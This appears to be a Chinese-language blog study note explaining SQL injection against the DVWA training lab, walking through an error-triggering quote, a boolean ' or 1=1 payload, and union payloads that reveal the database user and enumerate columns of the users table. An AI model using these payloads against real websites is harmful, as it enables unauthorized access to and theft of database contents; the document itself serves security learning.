owasp SQL 注入-03 (原理)

1: 先看一下注入界面:

点submit 后,可以看到有语法报错,说明已经起作用了:

报如下的错误:

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''''' at line 1

2:

SQL 注入语句解析:

Mysql>select first_name,last_name from dvwa.users;

Mysql>select first_name,last_name from dvwa.users where user_id='1';

mysql> select first_name,last_name from dvwa.users where user_id='1';

+------------+-----------+

| first_name | last_name |

+------------+-----------+

| admin | admin |

+------------+-----------+

1 row in set (0.00 sec)

2: 下面开始布尔注入:( or 或 and 和 的测试)

点击submit 看结果:

原因是: 先看上面的注入语句:

Mysql>select first_name,last_name from dvwa.users where user_id=' ' or 1=1 -- sheng';

看到上面的标绿色的 已经闭环了,后面的 -- 就把后面的所有的 开始认为是 注释内容,不参加反应了。

下面总结一下:

mysql> select first_name,last_name from dvwa.users where user_id=' ' union select user(),database() --'

'> ';

+----------------+-----------+

| first_name | last_name |

+----------------+-----------+

| root@localhost | NULL |

+----------------+-----------+

1 row in set (0.00 sec)

--

这条语句就可以看出是哪个user 来链接数据库的:

'union select user(), database() -- '

注意: 上面的语句-- 后面有空格:

看执行结果:

可以看到是用dvwa 用户来链接数据库的。

下面的SQL 注入的语句如下:

下面是关于字段的 SQL 注入语句:

下面看一下 输出结果:

'union select 1, column_name from INFORMATION_SCHEMA.columns where table_name='users' -- '

下面输出结果:

可以看出后面表的字段,就是这样被SQL 注入得到信息的。

参考文献: 13.SQL注入攻击_哔哩哔哩_bilibili

相关推荐
运维行者_7 小时前
企业无线网络监控的挑战与智能化演进趋势
大数据·运维·服务器·网络·数据库
国强_dev8 小时前
技术探讨:使用 stunnel 加密转发数据库连接时,如何获取客户端真实 IP?
数据库·网络协议·tcp/ip
@insist1238 小时前
系统规划与管理师-信息系统规划核心工作要点解析
数据库·软考·系统规划与管理师·软件水平考试·系统规划与管理工程师
超级数据查看器8 小时前
超级数据查看器 v10.0 发布
java·大数据·数据库·sqlite·安卓
数安3000天8 小时前
增量数据如何自动分类分级,避免目录“过期“?
大数据·数据库
南墙上的石头9 小时前
麒麟 V10 重装人大金仓 V8R6 踩坑实录(含 MySQL 兼容模式)
数据库·mysql
画中有画10 小时前
论向量数据库在项目中的应用
数据库
spider_xcxc10 小时前
Redis 数据库高质量实践指南(一)
运维·数据库·redis·oracle·云计算
l1t11 小时前
在linux和windows中解决duckdb 1.6dev版本输出执行计划报错问题
linux·运维·数据库·windows·duckdb
执子手 吹散苍茫茫烟波11 小时前
RC 隔离级别下 MySQL InnoDB 死锁典型案例
数据库·mysql